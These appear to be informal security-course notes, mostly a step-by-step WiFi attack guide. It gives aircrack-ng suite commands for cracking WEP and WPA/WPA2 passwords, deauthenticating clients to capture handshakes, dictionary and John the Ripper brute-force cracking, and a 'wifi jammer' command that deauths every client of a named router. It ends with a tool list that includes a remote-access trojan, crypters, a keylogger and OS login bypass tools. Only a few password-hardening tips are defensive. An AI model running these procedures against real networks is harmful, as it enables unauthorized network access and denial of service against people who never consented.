free wifi —> terrorist connect—-> email send —> inocent user got punish…..

Wireless secure

—————-

Strong password

–> numbers

–> alphabet

–> lowercase

–> upper case

–> special character

@bh!J33T$!NG#

–> Minimum length –> 8 characters

–> Never share your wifi password

–> Frequentely change

–> Disable WPS

WiFi –> IEEE 802.11 –> Set of rules

—————

WEP –> RC4

WPA/WPA2 –> DES/AES

DES –> Data Encryption Standard

AES –> Advance Encryption Standard

Step 1: To start the monitor mode

Step 2: To start gathering information about the wireless signals

Step 3: To start capturing the packets

Step 4: Cracking the WiFi password

Cracking WEP encryption

=======================

> airmon-ng start wlan0

kill processes

> airodump-ng wlan0mon

> airodump-ng –bssid <Target Router’s bssid> -c <channel number> -w wepcap wlan0mon

–bssid –> router’s mac address

-c –> channel number

-w –> to write/capture packets

> aircrack-ng wepcap-01.cap

Cracking WPA/WPA2

> airmon-ng start wlan0

kill processes

> airodump-ng wlan0mon

> airodump-ng –bssid <Target Router’s bssid> -c <channel number> -w wepcap wlan0mon

–bssid –> router’s mac address

-c –> channel number

-w –> to write/capture packets

> aireplay-ng -0 10 -a <bssid of router> -c <bssid of user> wlan0mon

-0 –> deauthentication packet

-a –> mac of target router

-c –> mac of any connected client

Dictionary attack

–> rockyou.txt –> /usr/share/wordlist/rockyou.txt

> aircrack-ng filename -w <pathOfDictionary>

Brute Force

–> John the ripper

> john –stdout –incremental | aircrack-ng -e “dlink-FA0C” -w – test001-01.cap

wifi jammer

———–

aireplay-ng -0 0 -a C0:A0:BB:F4:FA:0C -c FF:FF:FF:FF:FF:FF wlan0mon

airmon-ng

———

This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show  the  interfaces status.  It can also list/kill programs that can interfere with the wireless card operation.

airodump-ng

———–

airodump-ng  is  used  for packet capturing of raw 802.11 frames for the intent of using them

       with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng is  capa‐

       ble  of  logging the coordinates of the found access points. Additionally, airodump-ng writes

       out a text file containing the details of all access points and clients seen.

              Number of beacons sent by the AP. Each access point sends about ten beacons per second

              at the lowest rate (1M), so they can usually be picked up from very far.

       #Data  Number  of  captured  data packets (if WEP, unique IV count), including data broadcast

              packets.

       #/s    Number of data packets per second measure over the last 10 seconds.

       CH     Channel number (taken from beacon packets). Note: sometimes packets from  other  chan‐

              nels are captured even if airodump-ng is not hopping, because of radio interference.

       MB     Maximum  speed supported by the AP. If MB = 11, it’s 802.11b, if MB = 22 it’s 802.11b+

              and higher rates are 802.11g. The dot (after 54 above)  indicates  short  preamble  is

              supported. ‘e’ indicates that the network has QoS (802.11e) enabled.

       ENC    Encryption  algorithm  in  use. OPN = no encryption,”WEP?” = WEP or higher (not enough

              data to choose between WEP and WPA/WPA2), WEP (without the  question  mark)  indicates

              static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.

       CIPHER The  cipher  detected.  One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory,

              but TKIP is typically used with WPA and CCMP is typically used  with  WPA2.  WEP40  is

              displayed when the key index is greater then 0. The standard states that the index can

              be 0-3 for 40bit and should be 0 for 104 bit.

       AUTH   The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication

              server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for

              WEP).

       WPS    This is only displayed when –wps (or -W) is specified. If the AP  supports  WPS,  the

              first  field of the column indicates version supported. The second field indicates WPS

              config methods (can be more than one method, separated by comma): USB  =  USB  method,

              ETHER  = Ethernet, LAB = Label, DISP = Display, EXTNFC = External NFC, INTNFC = Inter‐

              nal NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD =  Keypad.  Locked  is  dis‐

              played when AP setup is locked.

       ESSID  The  so-called  “SSID”,  which can be empty if SSID hiding is activated. In this case,

              airodump-ng will try  to  recover  the  SSID  from  probe  responses  and  association

aircrack-ng

———–

aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.

       It can recover the WEP key once enough encrypted packets have been captured with airodump-ng.

       This part of the aircrack-ng suite determines the WEP key using two fundamental methods.  The

       first method is via the PTW approach (Pyshkin, Tews, Weinmann). The main advantage of the PTW

       approach is that very few data packets are required to crack the WEP key. The  second  method

       is  the  FMS/KoreK  method.  The FMS/KoreK method incorporates various statistical attacks to

       discover the WEP key and uses these in combination with brute forcing.

       Additionally, the program offers a dictionary method for determining the WEP key. For  crack‐

       ing WPA/WPA2 pre-shared keys, a wordlist (file or stdin) or an airolib-ng has to be used.

aireplay-ng

———–

aireplay-ng is used to inject/replay frames.  The primary function is to generate traffic for

       the later use in aircrack-ng for cracking the WEP  and  WPA-PSK  keys.  There  are  different

       attacks  which  can  cause deauthentications for the purpose of capturing WPA handshake data,

       fake authentications, Interactive packet replay, hand-crafted ARP request injection and  ARP-

       request reinjection. With the packetforge-ng tool it’s possible to create arbitrary frames.

——

Bypassing OS Login

System Protection/PT

Malware Protection

Information Gathering

Social Engineering

Email Security

OWASP TOP 10

VA

Wireless Protection

Traffic Monitoring

Mobile Platform Security/PT

WiFi Security/PT

anonymox

psiphon

hotspotshot shield

ultrasurf

hiren boot cd

kon boot cd

whoislookup

dnslookup

maltego

dark comet

urge cryptor

chrome cryptor

family key logger

syskey

angry ip scanner

xampp server

dvwa

sqlmap

havij

burp suite

mod security

netsparker

acunetix

zap

IBM app scaner

ettercap

xerosploit

bettercap

honeypod

driftnet

urlsnarf

sslstrip

netdiscover

airmon-ng

airodump-ng

aireplay-ng

aircrack-ng

john the ripper

---